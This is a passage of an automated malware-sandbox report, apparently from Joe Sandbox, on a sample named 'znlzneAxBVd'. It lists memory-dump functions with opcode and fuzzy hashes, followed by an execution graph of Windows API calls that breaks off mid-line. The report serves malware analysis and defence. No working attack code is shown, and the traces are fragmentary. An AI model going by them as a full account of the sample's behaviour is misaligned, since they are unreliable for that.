                          • Instruction Fuzzy Hash: 21E01A75F15608DBCF00DFA8E4409ECB7F4FB8D314B006426D419B3218E631A8268F54
                          Function 046A0193 Relevance: .0, Instructions: 24COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000F.00000002.401590326.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_46a0000_znlzneAxBVd.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f73616c6dd99ffbb82c0e8181206a7219d654c11bad514ffdfb608136f4c3ea3
                          • Instruction ID: 7f837cd5dd009732863a6dd934999b078887d241b8f6228ac13018fd0910bec3
                          • Opcode Fuzzy Hash: f73616c6dd99ffbb82c0e8181206a7219d654c11bad514ffdfb608136f4c3ea3
                          • Instruction Fuzzy Hash: 32E0B63691D704CFCB18CF6194583FCB6B8B75B34AF00A02AD045A21A2F3345996DF28
                          Function 046A0801 Relevance: .0, Instructions: 23COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000F.00000002.401590326.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_46a0000_znlzneAxBVd.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d7febaf856b50c75344abbac3eae160f7dd99365cedab37acdba2811d30cef1c
                          • Instruction ID: 036953bd54f80462e3ebadfccfe022270a70adffeb8748823411a23b2cdb2184
                          • Opcode Fuzzy Hash: d7febaf856b50c75344abbac3eae160f7dd99365cedab37acdba2811d30cef1c
                          • Instruction Fuzzy Hash: FDE0867084A3809FD31B8B7498213293FB59F43204B1542DAC491966A1D7354D15CBA2
                          Function 046A15B8 Relevance: .0, Instructions: 23COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000F.00000002.401590326.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_46a0000_znlzneAxBVd.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 49476233d1c15e90b2a6e2cf3318415c6fc364fb9ad7eb1d13d20a73588af60d
                          • Instruction ID: f190c0dea5d0785a88acf0081f7bdc07e1f2282806f6fc18f0a76be3545a599e
                          • Opcode Fuzzy Hash: 49476233d1c15e90b2a6e2cf3318415c6fc364fb9ad7eb1d13d20a73588af60d
                          • Instruction Fuzzy Hash: FDF06DB49182849FC745DFB8D85429CBFF0AB0A200F6441DAC444D7361D3348E25CF01
                          Function 046A1021 Relevance: .0, Instructions: 22COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000F.00000002.401590326.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_46a0000_znlzneAxBVd.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ff270476f2d89f075b3f6d4489c4ab3ed1a0752bc899625203ae70fe9e4bf09a
                          • Instruction ID: 85ac35c126db140e34b4d86ccd0fb288ec5462956b804646e4e2c8236117bae2
                          • Opcode Fuzzy Hash: ff270476f2d89f075b3f6d4489c4ab3ed1a0752bc899625203ae70fe9e4bf09a
                          • Instruction Fuzzy Hash: 1FE08C7040D2D88FD30787A4AC2626A3FA89B03204B0942CAC441DB2A2CA344E01CB62
                          Function 046A0EFF Relevance: .0, Instructions: 22COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000F.00000002.401590326.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_46a0000_znlzneAxBVd.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6edfdfb2751eb0355241a78b19782c0b76e7b400714a42196b1ee274095926e8
                          • Instruction ID: 71e191a65c5b7073191694b69962983ace0f9f69c7de4da1096848d633ddeab4
                          • Opcode Fuzzy Hash: 6edfdfb2751eb0355241a78b19782c0b76e7b400714a42196b1ee274095926e8
                          • Instruction Fuzzy Hash: 5BE04F30D192848FC7069FB4AC5A3AC7FF0EF46201F1441EADC82962A1D6384A46DB52
                          Function 046A3231 Relevance: .0, Instructions: 21COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000F.00000002.401590326.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_46a0000_znlzneAxBVd.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7b5dc274c02d66ad9701b63edb06025c8de16bbec699b7e8b7fe3f4d10e6768b
                          • Instruction ID: cc406249dde4c77f8ef6cfb122bf1c1c06fc9cb530cc6365418f4934304e4008
                          • Opcode Fuzzy Hash: 7b5dc274c02d66ad9701b63edb06025c8de16bbec699b7e8b7fe3f4d10e6768b
                          • Instruction Fuzzy Hash: 92E0657A900219AFCB00CF90C940BE8BBB9EB08300F1080C5D509A3284CB31AE82DF10
                          Function 046A2CC0 Relevance: .0, Instructions: 20COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000F.00000002.401590326.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_46a0000_znlzneAxBVd.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1a3512f719de621b7a7e672684aa684536cd990757d878b5c32c00412619ef8a
                          • Instruction ID: 2066d28aa0ba3c7d6a9e2c9dba2541f6ee9ae26b6ebff8e7b19e7b9741a95f4b
                          • Opcode Fuzzy Hash: 1a3512f719de621b7a7e672684aa684536cd990757d878b5c32c00412619ef8a
                          • Instruction Fuzzy Hash: FAE01279A48618DFDF54CF90CD90BECBBB5AB48304F20509A950DAB391D3755E85DF00
                          Function 046A0F40 Relevance: .0, Instructions: 20COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000F.00000002.401590326.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_46a0000_znlzneAxBVd.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d9e346e4c1f753c94a66f86377a79b506f5dec251f9a5eafa4596d0ae35b3692
                          • Instruction ID: f70593bf6dad6c5b57f4953082480ed9113c575b0ce85044fa99319d52ec1004
                          • Opcode Fuzzy Hash: d9e346e4c1f753c94a66f86377a79b506f5dec251f9a5eafa4596d0ae35b3692
                          • Instruction Fuzzy Hash: 2EE0867080A3D4DFDB16DBB495213AC7FB19B03305F5441EAC4849A2A1D7354A59DF11
                          Function 046A015D Relevance: .0, Instructions: 20COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000F.00000002.401590326.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_46a0000_znlzneAxBVd.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ad6dedb7709ceb234483eed55b348e8e73a11c8028cb851ea3046646ceb315b1
                          • Instruction ID: 34ab88a2b749718b8e65eb076b2f62d9dc8fef7e0a9a0d406c3a84834f8db3b8
                          • Opcode Fuzzy Hash: ad6dedb7709ceb234483eed55b348e8e73a11c8028cb851ea3046646ceb315b1
                          • Instruction Fuzzy Hash: 31E0261680E3D5CBEB028B2078E129CFF349B47208F0514CAC48467193EB010216C706
                          Function 046A0C18 Relevance: .0, Instructions: 18COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000F.00000002.401590326.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_46a0000_znlzneAxBVd.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 69321aa90786ac939c46469f6f72d4391df2981e395b6ddb8f67b4f49df30d56
                          • Instruction ID: b12be6a2be55d175d45d44594a7cbe4cfb0b96bbb31fd1a897eaf8602648639e
                          • Opcode Fuzzy Hash: 69321aa90786ac939c46469f6f72d4391df2981e395b6ddb8f67b4f49df30d56
                          • Instruction Fuzzy Hash: 37E01238D00208AFCB04DFA9D4446ACBBB4AB49300F1480EAD84057360D630AA00DF81
                          Function 046A15C8 Relevance: .0, Instructions: 18COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000F.00000002.401590326.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_46a0000_znlzneAxBVd.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b159949aa53e6e44021489b7a800745c4ea322b28a632a6f8eb563b8b6198415
                          • Instruction ID: b047802abe2db382789db500682392a7b26249e1893fc66b7dfb8c7c8267028f
                          • Opcode Fuzzy Hash: b159949aa53e6e44021489b7a800745c4ea322b28a632a6f8eb563b8b6198415
                          • Instruction Fuzzy Hash: C6E0B674910218DFC744DFA8D58479CBBF4AB09301F2041A9D909D7360E730AE54DF41
                          Function 046A05B8 Relevance: .0, Instructions: 18COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000F.00000002.401590326.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_46a0000_znlzneAxBVd.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ae9af1c8494352bd02582ecf0ea0c55747fd5260194a085af98629ea577ad10f
                          • Instruction ID: adfc217d84b07f035f8b209e6f06ca947a290c21ac45ff4a1645b2d79e3fb2a5
                          • Opcode Fuzzy Hash: ae9af1c8494352bd02582ecf0ea0c55747fd5260194a085af98629ea577ad10f
                          • Instruction Fuzzy Hash: 42D012704051149ED709CFA4D9147AC7F699752301F545296C404E3264DB310D16CF15
                          Function 046A1A98 Relevance: .0, Instructions: 17COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000F.00000002.401590326.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_46a0000_znlzneAxBVd.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7f10d8b5760a3b736e2d902f104de292098e443c91dcb37bbd599e1cc80ae1fe
                          • Instruction ID: 87d53c2c210bab49c787362378f6c49ab18bc2d8b9e816d7f64e42eff371650e
                          • Opcode Fuzzy Hash: 7f10d8b5760a3b736e2d902f104de292098e443c91dcb37bbd599e1cc80ae1fe
                          • Instruction Fuzzy Hash: 6FD017349091189BC704DBA8E9406ADBBB8AB42300F1442AAC90923240E6302E96DB85
                          Function 046A1BB8 Relevance: .0, Instructions: 16COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000F.00000002.401590326.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_46a0000_znlzneAxBVd.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1e82afee9410e1ef8d5ee874b97f25fa3308fac774c463c1f161b0daad445a64
                          • Instruction ID: 42e2286911e220413aa9aa0ac57ad4c93d9bcad4b4f01ed4c88fc177927c73b9
                          • Opcode Fuzzy Hash: 1e82afee9410e1ef8d5ee874b97f25fa3308fac774c463c1f161b0daad445a64
                          • Instruction Fuzzy Hash: 48D01730D00208EFCB48EFA8D8453DDBBF4AB04200F1440A9C808A3340E7305A94CF81
                          Function 046A0F10 Relevance: .0, Instructions: 14COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000F.00000002.401590326.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_46a0000_znlzneAxBVd.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 16904132c657943223992a0bd0fdd5199133214238574b1f3b49fcd22232ada1
                          • Instruction ID: b59ba0259e67a918fca403a84366fda065e52e26a33d2606a09f05d49666cbb0
                          • Opcode Fuzzy Hash: 16904132c657943223992a0bd0fdd5199133214238574b1f3b49fcd22232ada1
                          • Instruction Fuzzy Hash: 79D05234C00208EBCB04EFA8E8583ACBFF8AB04202F0440EACC4062390EB301A50DF91
                          Function 046A05C8 Relevance: .0, Instructions: 14COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000F.00000002.401590326.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_46a0000_znlzneAxBVd.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: be9a9189ef591a9a9efa941071da1cc376378245b92b81b95380b565c03f5882
                          • Instruction ID: 985249fb126ba5f20e555c2088a30b76cc8f80b3f6c7e327d9c6ac2f34bb3544
                          • Opcode Fuzzy Hash: be9a9189ef591a9a9efa941071da1cc376378245b92b81b95380b565c03f5882
                          • Instruction Fuzzy Hash: C4D01270401208DBC708DFE9D915B5DBBFCE746742F04519AD80863250DF312D10DF59
                          Function 046A2030 Relevance: .0, Instructions: 13COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000F.00000002.401590326.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_46a0000_znlzneAxBVd.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 75e18f247db54ac37c84766aa5063b404c94485675916bdbf9c314faa28f72bd
                          • Instruction ID: 88ab58007e4c4ee9fe6e41659c85d7cb99177721309451c3465913dfb34b7d8c
                          • Opcode Fuzzy Hash: 75e18f247db54ac37c84766aa5063b404c94485675916bdbf9c314faa28f72bd
                          • Instruction Fuzzy Hash: 95C0123044110C9BC714DF99D811B6D77ACD751354F044099C90453350DB311D10DB95
                          Function 046A1030 Relevance: .0, Instructions: 13COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000F.00000002.401590326.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_46a0000_znlzneAxBVd.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 70330fdec53ede415259deca251dbdbb7039eb28b3bf76c6f55dba6d1717f65b
                          • Instruction ID: e899057614bd900011e41b1961b877ea230f7d082f3127c8e0035cb61e9a780b
                          • Opcode Fuzzy Hash: 70330fdec53ede415259deca251dbdbb7039eb28b3bf76c6f55dba6d1717f65b
                          • Instruction Fuzzy Hash: 1AC0123040512DDBC704DBD9D85576D77AC9741345F040199C90453250DB311E10DB95
                          Function 046A121C Relevance: .0, Instructions: 11COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000F.00000002.401590326.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_46a0000_znlzneAxBVd.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5b579c713463ad7903aa6922648823ec49057ab4188271d8fb7df67b6b214fd6
                          • Instruction ID: 49be5ee9a77a96fd9a87517f5caefef25bf96a093c83d0803cc051dbea34eb4e
                          • Opcode Fuzzy Hash: 5b579c713463ad7903aa6922648823ec49057ab4188271d8fb7df67b6b214fd6
                          • Instruction Fuzzy Hash: 0EC09B35B45404D7CB00DBD4F4051FCB735DBC7137F001061D10D9355197201F659B55
                          Function 046A0216 Relevance: .0, Instructions: 8COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000F.00000002.401590326.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_46a0000_znlzneAxBVd.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6d71d85091b60d14e37e8d0151a8737b1e0489bdc365a0a45f0fd43df3ae5f44
                          • Instruction ID: e550e00875aaea53ef93a12cc18ac2cf4846a0f88196c12c40fe800d1ad53ae5
                          • Opcode Fuzzy Hash: 6d71d85091b60d14e37e8d0151a8737b1e0489bdc365a0a45f0fd43df3ae5f44
                          • Instruction Fuzzy Hash: B5C04830206A00CBD3009F60E80ABAA3772E702309F50600690276326AE7786CA9DA09

                          Execution Graph

                          Execution Coverage:5.6%
                          Dynamic/Decrypted Code Coverage:9.2%
                          Signature Coverage:2.4%
                          Total number of Nodes:2000
                          Total number of Limit Nodes:58
                          execution_graph 37666 4466f4 37685 446904 37666->37685 37668 446700 GetModuleHandleA 37671 446710 __set_app_type __p__fmode __p__commode 37668->37671 37670 4467a4 37672 4467ac __setusermatherr 37670->37672 37673 4467b8 37670->37673 37671->37670 37672->37673 37686 4468f0 _controlfp 37673->37686 37675 4467bd _initterm GetEnvironmentStringsW _initterm 37676 44681e GetStartupInfoW 37675->37676 37677 446810 37675->37677 37679 446866 GetModuleHandleA 37676->37679 37687 41276d 37679->37687 37683 446896 exit 37684 44689d _cexit 37683->37684 37684->37677 37685->37668 37686->37675 37688 41277d 37687->37688 37730 4044a4 LoadLibraryW 37688->37730 37690 412785 37722 412789 37690->37722 37738 414b81 37690->37738 37693 4127c8 37744 412465 memset ??2@YAPAXI 37693->37744 37695 4127ea 37756 40ac21 37695->37756 37700 412813 37774 40dd07 memset 37700->37774 37701 412827 37779 40db69 memset 37701->37779 37705 40ada2 _wcsicmp 37707 41283d 37705->37707 37706 412822 37801 4125b6 ??3@YAXPAX DeleteObject 37706->37801 37707->37706 37710 412863 CoInitialize 37707->37710 37784 41268e 37707->37784 37709 412966 37802 40b1ab ??3@YAXPAX ??3@YAXPAX 37709->37802 37800 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 37710->37800 37714 41296f 37803 40b633 37714->37803 37716 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 37721 412957 CoUninitialize 37716->37721 37727 4128ca 37716->37727 37721->37706 37722->37683 37722->37684 37723 4128d0 TranslateAcceleratorW 37724 412941 GetMessageW 37723->37724 37723->37727 37724->37721 37724->37723 37725 412909 IsDialogMessageW 37725->37724 37725->37727 37726 4128fd IsDialogMessageW 37726->37724 37726->37725 37727->37723 37727->37725 37727->37726 37728 41292b TranslateMessage DispatchMessageW 37727->37728 37729 41291f IsDialogMessageW 37727->37729 37728->37724 37729->37724 37729->37728 37731 4044f7 37730->37731 37732 4044cf GetProcAddress 37730->37732 37736 404507 MessageBoxW 37731->37736 37737 40451e 37731->37737 37733 4044e8 FreeLibrary 37732->37733 37734 4044df 37732->37734 37733->37731 37735 4044f3 37733->37735 37734->37733 37735->37731 37736->37690 37737->37690 37739 414b8a 37738->37739 37740 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 37738->37740 37807 40a804 memset 37739->37807 37740->37693 37743 414b9e GetProcAddress 37743->37740 37745 4124e0 37744->37745 37746 412505 ??2@YAPAXI 37745->37746 37747 41251c 37746->37747 37749 412521 37746->37749 37829 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 37747->37829 37818 444722 37749->37818 37755 41259b wcscpy 37755->37695 37834 40b1ab ??3@YAXPAX ??3@YAXPAX 37756->37834 37760 40a9ce malloc memcpy ??3@YAXPAX ??3@YAXPAX 37763 40ac5c 37760->37763 37761 40ad4b 37769 40ad76 37761->37769 37858 40a9ce 37761->37858 37763->37760 37763->37761 37764 40ace7 ??3@YAXPAX 37763->37764 37763->37769 37838 40a8d0 37763->37838 37850 4099f4 37763->37850 37764->37763 37768 40a8d0 7 API calls 37768->37769 37835 40aa04 37769->37835 37770 40ada2 37771 40adc9 37770->37771 37772 40adaa 37770->37772 37771->37700 37771->37701 37772->37771 37773 40adb3 _wcsicmp 37772->37773 37773->37771 37773->37772 37863 40dce0 37774->37863 37776 40dd3a GetModuleHandleW 37868 40dba7 37776->37868 37780 40dce0 3 API calls 37779->37780 37781 40db99 37780->37781 37940 40dae1 37781->37940 37954 402f3a 37784->37954 37786 412766 37786->37706 37786->37710 37787 4126d3 _wcsicmp 37788 4126a8 37787->37788 37788->37786 37788->37787 37790 41270a 37788->37790 37988 4125f8 7 API calls 37788->37988 37790->37786 37957 411ac5 37790->37957 37800->37716 37801->37709 37802->37714 37804 40b640 37803->37804 37805 40b639 ??3@YAXPAX 37803->37805 37806 40b1ab ??3@YAXPAX ??3@YAXPAX 37804->37806 37805->37804 37806->37722 37808 40a83b GetSystemDirectoryW 37807->37808 37809 40a84c wcscpy 37807->37809 37808->37809 37814 409719 wcslen 37809->37814 37812 40a881 LoadLibraryW 37813 40a886 37812->37813 37813->37740 37813->37743 37815 409724 37814->37815 37816 409739 wcscat LoadLibraryW 37814->37816 37815->37816 37817 40972c wcscat 37815->37817 37816->37812 37816->37813 37817->37816 37819 444732 37818->37819 37820 444728 DeleteObject 37818->37820 37830 409cc3 37819->37830 37820->37819 37822 412551 37823 4010f9 37822->37823 37824 401130 37823->37824 37825 401134 GetModuleHandleW LoadIconW 37824->37825 37826 401107 wcsncat 37824->37826 37827 40a7be 37825->37827 37826->37824 37828 40a7d2 37827->37828 37828->37755 37828->37828 37829->37749 37833 409bfd memset wcscpy 37830->37833 37832 409cdb CreateFontIndirectW 37832->37822 37833->37832 37834->37763 37836 40aa14 37835->37836 37837 40aa0a ??3@YAXPAX 37835->37837 37836->37770 37837->37836 37839 40a8eb 37838->37839 37840 40a8df wcslen 37838->37840 37841 40a906 ??3@YAXPAX 37839->37841 37842 40a90f 37839->37842 37840->37839 37843 40a919 37841->37843 37844 4099f4 3 API calls 37842->37844 37845 40a932 37843->37845 37846 40a929 ??3@YAXPAX 37843->37846 37844->37843 37848 4099f4 3 API calls 37845->37848 37847 40a93e memcpy 37846->37847 37847->37763 37849 40a93d 37848->37849 37849->37847 37851 409a41 37850->37851 37852 4099fb malloc 37850->37852 37851->37763 37854 409a37 37852->37854 37855 409a1c 37852->37855 37854->37763 37856 409a30 ??3@YAXPAX 37855->37856 37857 409a20 memcpy 37855->37857 37856->37854 37857->37856 37859 40a9e7 37858->37859 37860 40a9dc ??3@YAXPAX 37858->37860 37861 4099f4 3 API calls 37859->37861 37862 40a9f2 37860->37862 37861->37862 37862->37768 37887 409bca GetModuleFileNameW 37863->37887 37865 40dce6 wcsrchr 37866 40dcf5 37865->37866 37867 40dcf9 wcscat 37865->37867 37866->37867 37867->37776 37888 44db70 37868->37888 37872 40dbfd 37891 4447d9 37872->37891 37875 40dc34 wcscpy wcscpy 37917 40d6f5 37875->37917 37876 40dc1f wcscpy 37876->37875 37879 40d6f5 3 API calls 37880 40dc73 37879->37880 37881 40d6f5 3 API calls 37880->37881 37882 40dc89 37881->37882 37883 40d6f5 3 API calls 37882->37883 37884 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 37883->37884 37923 40da80 37884->37923 37887->37865 37889 40dbb4 memset memset 37888->37889 37890 409bca GetModuleFileNameW 37889->37890 37890->37872 37892 4447f4 37891->37892 37893 40dc1b 37892->37893 37894 444807 ??2@YAPAXI 37892->37894 37893->37875 37893->37876 37895 44481f 37894->37895 37896 444873 _snwprintf 37895->37896 37897 4448ab wcscpy 37895->37897 37930 44474a 8 API calls 37896->37930 37899 4448bb 37897->37899 37931 44474a 8 API calls 37899->37931 37900 4448a7 37900->37897 37900->37899 37902 4448cd 37932 44474a 8 API calls 37902->37932 37904 4448e2 37933 44474a 8 API calls 37904->37933 37906 4448f7 37934 44474a 8 API calls 37906->37934 37908 44490c 37935 44474a 8 API calls 37908->37935 37910 444921 37936 44474a 8 API calls 37910->37936 37912 444936 37937 44474a 8 API calls 37912->37937 37914 44494b 37938 44474a 8 API calls 37914->37938 37916 444960 ??3@YAXPAX 37916->37893 37918 44db70 37917->37918 37919 40d702 memset GetPrivateProfileStringW 37918->37919 37920 40d752 37919->37920 37921 40d75c WritePrivateProfileStringW 37919->37921 37920->37921 37922 40d758 37920->37922 37921->37922 37922->37879 37924 44db70 37923->37924 37925 40da8d memset 37924->37925 37926 40daac LoadStringW 37925->37926 37927 40dac6 37926->37927 37927->37926 37928 40dade 37927->37928 37939 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 37927->37939 37928->37706 37930->37900 37931->37902 37932->37904 37933->37906 37934->37908 37935->37910 37936->37912 37937->37914 37938->37916 37939->37927 37950 409b98 GetFileAttributesW 37940->37950 37942 40daea 37943 40daef wcscpy wcscpy GetPrivateProfileIntW 37942->37943 37949 40db63 37942->37949 37951 40d65d GetPrivateProfileStringW 37943->37951 37945 40db3e 37952 40d65d GetPrivateProfileStringW 37945->37952 37947 40db4f 37953 40d65d GetPrivateProfileStringW 37947->37953 37949->37705 37950->37942 37951->37945 37952->37947 37953->37949 37989 40eaff 37954->37989 37958 411ae2 memset 37957->37958 37959 411b8f 37957->37959 38029 409bca GetModuleFileNameW 37958->38029 37971 411a8b 37959->37971 37961 411b0a wcsrchr 37962 411b22 wcscat 37961->37962 37963 411b1f 37961->37963 38030 414770 wcscpy wcscpy wcscpy CreateFileW CloseHandle 37962->38030 37963->37962 37965 411b67 38031 402afb 37965->38031 37969 411b7f 38087 40ea13 SendMessageW memset SendMessageW 37969->38087 37972 402afb 27 API calls 37971->37972 37973 411ac0 37972->37973 37974 4110dc 37973->37974 37975 41113e 37974->37975 37980 4110f0 37974->37980 38112 40969c LoadCursorW SetCursor 37975->38112 37977 411143 38113 4032b4 37977->38113 38131 444a54 37977->38131 37978 4110f7 _wcsicmp 37978->37980 37979 411157 37981 40ada2 _wcsicmp 37979->37981 37980->37975 37980->37978 38134 410c46 10 API calls 37980->38134 37984 411167 37981->37984 37982 4111af 37984->37982 37985 4111a6 qsort 37984->37985 37985->37982 37988->37788 37990 40eb10 37989->37990 38002 40e8e0 37990->38002 37993 40eb6c memcpy memcpy 37994 40ebb7 37993->37994 37994->37993 37995 40ebf2 ??2@YAPAXI ??2@YAPAXI 37994->37995 37998 40d134 16 API calls 37994->37998 37996 40ec2e ??2@YAPAXI 37995->37996 37997 40ec65 37995->37997 37996->37997 38012 40ea7f 37997->38012 37998->37994 38001 402f49 38001->37788 38003 40e8f2 38002->38003 38004 40e8eb ??3@YAXPAX 38002->38004 38005 40e900 38003->38005 38006 40e8f9 ??3@YAXPAX 38003->38006 38004->38003 38007 40e911 38005->38007 38008 40e90a ??3@YAXPAX 38005->38008 38006->38005 38009 40e931 ??2@YAPAXI ??2@YAPAXI 38007->38009 38010 40e921 ??3@YAXPAX 38007->38010 38011 40e92a ??3@YAXPAX 38007->38011 38008->38007 38009->37993 38010->38011 38011->38009 38013 40aa04 ??3@YAXPAX 38012->38013 38014 40ea88 38013->38014 38015 40aa04 ??3@YAXPAX 38014->38015 38016 40ea90 38015->38016 38017 40aa04 ??3@YAXPAX 38016->38017 38018 40ea98 38017->38018 38019 40aa04 ??3@YAXPAX 38018->38019 38020 40eaa0 38019->38020 38021 40a9ce 4 API calls 38020->38021 38022 40eab3 38021->38022 38023 40a9ce 4 API calls 38022->38023 38024 40eabd 38023->38024 38025 40a9ce 4 API calls 38024->38025 38026 40eac7 38025->38026 38027 40a9ce 4 API calls 38026->38027 38028 40ead1 38027->38028 38028->38001 38029->37961 38030->37965 38088 40b2cc 38031->38088 38033 402b0a 38034 40b2cc 27 API calls 38033->38034 38035 402b23 38034->38035 38036 40b2cc 27 API calls 38035->38036 38037 402b3a 38036->38037 38038 40b2cc 27 API calls 38037->38038 38039 402b54 38038->38039 38040 40b2cc 27 API calls 38039->38040 38041 402b6b 38040->38041 38042 40b2cc 27 API calls 38041->38042 38043 402b82 38042->38043 38044 40b2cc 27 API calls 38043->38044 38045 402b99 38044->38045 38046 40b2cc 27 API calls 38045->38046 38047 402bb0 38046->38047 38048 40b2cc 27 API calls 38047->38048 38049 402bc7 38048->38049 38050 40b2cc 27 API calls 38049->38050 38051 402bde 38050->38051 38052 40b2cc 27 API calls 38051->38052 38053 402bf5 38052->38053 38054 40b2cc 27 API calls 38053->38054 38055 402c0c 38054->38055 38056 40b2cc 27 API calls 38055->38056 38057 402c23 38056->38057 38058 40b2cc 27 API calls 38057->38058 38059 402c3a 38058->38059 38060 40b2cc 27 API calls 38059->38060 38061 402c51 38060->38061 38062 40b2cc 27 API calls 38061->38062 38063 402c68 38062->38063 38064 40b2cc 27 API calls 38063->38064 38065 402c7f 38064->38065 38066 40b2cc 27 API calls 38065->38066 38067 402c99 38066->38067 38068 40b2cc 27 API calls 38067->38068 38069 402cb3 38068->38069 38070 